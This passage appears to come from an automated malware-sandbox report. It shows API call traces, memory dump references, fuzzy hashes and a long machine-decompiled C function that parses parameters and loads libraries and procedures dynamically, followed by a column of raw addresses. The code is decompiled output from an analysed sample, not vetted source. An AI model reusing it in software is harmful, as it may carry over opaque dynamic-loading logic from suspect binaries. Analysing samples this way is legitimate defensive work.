                                                                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 00405B31
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 00405B47
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00405B8C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                            • String ID: H7B${
                                                                                                                                                                                                                            • API String ID: 4154960007-2256286769
                                                                                                                                                                                                                            • Opcode ID: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
                                                                                                                                                                                                                            • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 687E1BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMONCrypto
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                            			E687E1BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E687E12BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E687E12BB();
				_t321 = E687E12E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t332 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E687E13B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E687E162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x687e23e8) & 0x000000ff) * 4 +  &M687E235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E687E12CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E687E12BB();
											 &_v12 = E687E1B86( &_v12);
											__eax = E687E1510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E687E1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E687E1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x687e405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E687E1B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324); // executed
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E687E16BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E687E13B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E687E16BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E687E13B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E687E13B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E687E13B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E687E12CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E687E13B1(_t90) * 4);
					goto L165;
				}
			}

































































                                                                                                                                                                                                                            0x687e1c07
                                                                                                                                                                                                                            0x687e1c0a
                                                                                                                                                                                                                            0x687e1c0d
                                                                                                                                                                                                                            0x687e1c10
                                                                                                                                                                                                                            0x687e1c13
                                                                                                                                                                                                                            0x687e1c16
                                                                                                                                                                                                                            0x687e1c19
                                                                                                                                                                                                                            0x687e1c1b
                                                                                                                                                                                                                            0x687e1c1e
                                                                                                                                                                                                                            0x687e1c21
                                                                                                                                                                                                                            0x687e1c26
                                                                                                                                                                                                                            0x687e1c29
                                                                                                                                                                                                                            0x687e1c31
                                                                                                                                                                                                                            0x687e1c39
                                                                                                                                                                                                                            0x687e1c3b
                                                                                                                                                                                                                            0x687e1c3e
                                                                                                                                                                                                                            0x687e1c46
                                                                                                                                                                                                                            0x687e1c46
                                                                                                                                                                                                                            0x687e1c4b
                                                                                                                                                                                                                            0x687e1c4e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1c5b
                                                                                                                                                                                                                            0x687e1c60
                                                                                                                                                                                                                            0x687e1c62
                                                                                                                                                                                                                            0x687e1cf4
                                                                                                                                                                                                                            0x687e1cf4
                                                                                                                                                                                                                            0x687e1cf4
                                                                                                                                                                                                                            0x687e1cf8
                                                                                                                                                                                                                            0x687e1cfb
                                                                                                                                                                                                                            0x687e1cfd
                                                                                                                                                                                                                            0x687e1d1f
                                                                                                                                                                                                                            0x687e1d21
                                                                                                                                                                                                                            0x687e1d24
                                                                                                                                                                                                                            0x687e1d33
                                                                                                                                                                                                                            0x687e1d35
                                                                                                                                                                                                                            0x687e1d3b
                                                                                                                                                                                                                            0x687e1d3b
                                                                                                                                                                                                                            0x687e1d41
                                                                                                                                                                                                                            0x687e1d44
                                                                                                                                                                                                                            0x687e1d44
                                                                                                                                                                                                                            0x687e1d47
                                                                                                                                                                                                                            0x687e1d47
                                                                                                                                                                                                                            0x687e1d4d
                                                                                                                                                                                                                            0x687e1d4f
                                                                                                                                                                                                                            0x687e1d4f
                                                                                                                                                                                                                            0x687e1d51
                                                                                                                                                                                                                            0x687e1d54
                                                                                                                                                                                                                            0x687e1d57
                                                                                                                                                                                                                            0x687e1d5d
                                                                                                                                                                                                                            0x687e1d63
                                                                                                                                                                                                                            0x687e1d66
                                                                                                                                                                                                                            0x687e1d8a
                                                                                                                                                                                                                            0x687e1d8d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1d90
                                                                                                                                                                                                                            0x687e1d92
                                                                                                                                                                                                                            0x687e1da0
                                                                                                                                                                                                                            0x687e1da3
                                                                                                                                                                                                                            0x687e1da5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1da7
                                                                                                                                                                                                                            0x687e1da7
                                                                                                                                                                                                                            0x687e1da7
                                                                                                                                                                                                                            0x687e1dad
                                                                                                                                                                                                                            0x687e1daf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1db1
                                                                                                                                                                                                                            0x687e1db3
                                                                                                                                                                                                                            0x687e1db5
                                                                                                                                                                                                                            0x687e1db7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1db7
                                                                                                                                                                                                                            0x687e1db9
                                                                                                                                                                                                                            0x687e1dbb
                                                                                                                                                                                                                            0x687e1dbd
                                                                                                                                                                                                                            0x687e1dbd
                                                                                                                                                                                                                            0x687e1dc3
                                                                                                                                                                                                                            0x687e1dc9
                                                                                                                                                                                                                            0x687e1dcb
                                                                                                                                                                                                                            0x687e1ddf
                                                                                                                                                                                                                            0x687e1ddf
                                                                                                                                                                                                                            0x687e1de1
                                                                                                                                                                                                                            0x687e1dcd
                                                                                                                                                                                                                            0x687e1dd3
                                                                                                                                                                                                                            0x687e1dd6
                                                                                                                                                                                                                            0x687e1dd6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1d68
                                                                                                                                                                                                                            0x687e1d68
                                                                                                                                                                                                                            0x687e1d68
                                                                                                                                                                                                                            0x687e1d69
                                                                                                                                                                                                                            0x687e1d71
                                                                                                                                                                                                                            0x687e1d75
                                                                                                                                                                                                                            0x687e1d7b
                                                                                                                                                                                                                            0x687e1d7f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1d7f
                                                                                                                                                                                                                            0x687e1d6b
                                                                                                                                                                                                                            0x687e1d6b
                                                                                                                                                                                                                            0x687e1d6c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1d6e
                                                                                                                                                                                                                            0x687e1d6f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1d6f
                                                                                                                                                                                                                            0x687e1cff
                                                                                                                                                                                                                            0x687e1d00
                                                                                                                                                                                                                            0x687e1d09
                                                                                                                                                                                                                            0x687e1d0c
                                                                                                                                                                                                                            0x687e1d19
                                                                                                                                                                                                                            0x687e1d19
                                                                                                                                                                                                                            0x687e1d0e
                                                                                                                                                                                                                            0x687e1d0e
                                                                                                                                                                                                                            0x687e1de7
                                                                                                                                                                                                                            0x687e1dea
                                                                                                                                                                                                                            0x687e1dee
                                                                                                                                                                                                                            0x687e1e61
                                                                                                                                                                                                                            0x687e1e65
                                                                                                                                                                                                                            0x687e1c43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1c43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1e65
                                                                                                                                                                                                                            0x687e1cfd
                                                                                                                                                                                                                            0x687e1c68
                                                                                                                                                                                                                            0x687e1c6b
                                                                                                                                                                                                                            0x687e1cce
                                                                                                                                                                                                                            0x687e1cd1
                                                                                                                                                                                                                            0x687e1ce3
                                                                                                                                                                                                                            0x687e1ce3
                                                                                                                                                                                                                            0x687e1ce6
                                                                                                                                                                                                                            0x687e1df3
                                                                                                                                                                                                                            0x687e1df6
                                                                                                                                                                                                                            0x687e1df6
                                                                                                                                                                                                                            0x687e1df8
                                                                                                                                                                                                                            0x687e21ae
                                                                                                                                                                                                                            0x687e21c6
                                                                                                                                                                                                                            0x687e21c6
                                                                                                                                                                                                                            0x687e21c9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21b3
                                                                                                                                                                                                                            0x687e21b4
                                                                                                                                                                                                                            0x687e21b7
                                                                                                                                                                                                                            0x687e21ba
                                                                                                                                                                                                                            0x687e2244
                                                                                                                                                                                                                            0x687e224b
                                                                                                                                                                                                                            0x687e2251
                                                                                                                                                                                                                            0x687e2255
                                                                                                                                                                                                                            0x687e1e5c
                                                                                                                                                                                                                            0x687e1e5d
                                                                                                                                                                                                                            0x687e1e5d
                                                                                                                                                                                                                            0x687e1e5e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1e5e
                                                                                                                                                                                                                            0x687e21c0
                                                                                                                                                                                                                            0x687e21c3
                                                                                                                                                                                                                            0x687e21c3
                                                                                                                                                                                                                            0x687e21cb
                                                                                                                                                                                                                            0x687e21ce
                                                                                                                                                                                                                            0x687e2238
                                                                                                                                                                                                                            0x687e1e51
                                                                                                                                                                                                                            0x687e1e54
                                                                                                                                                                                                                            0x687e1e57
                                                                                                                                                                                                                            0x687e1e5a
                                                                                                                                                                                                                            0x687e1e5a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1e5a
                                                                                                                                                                                                                            0x687e21d0
                                                                                                                                                                                                                            0x687e21d3
                                                                                                                                                                                                                            0x687e21da
                                                                                                                                                                                                                            0x687e21da
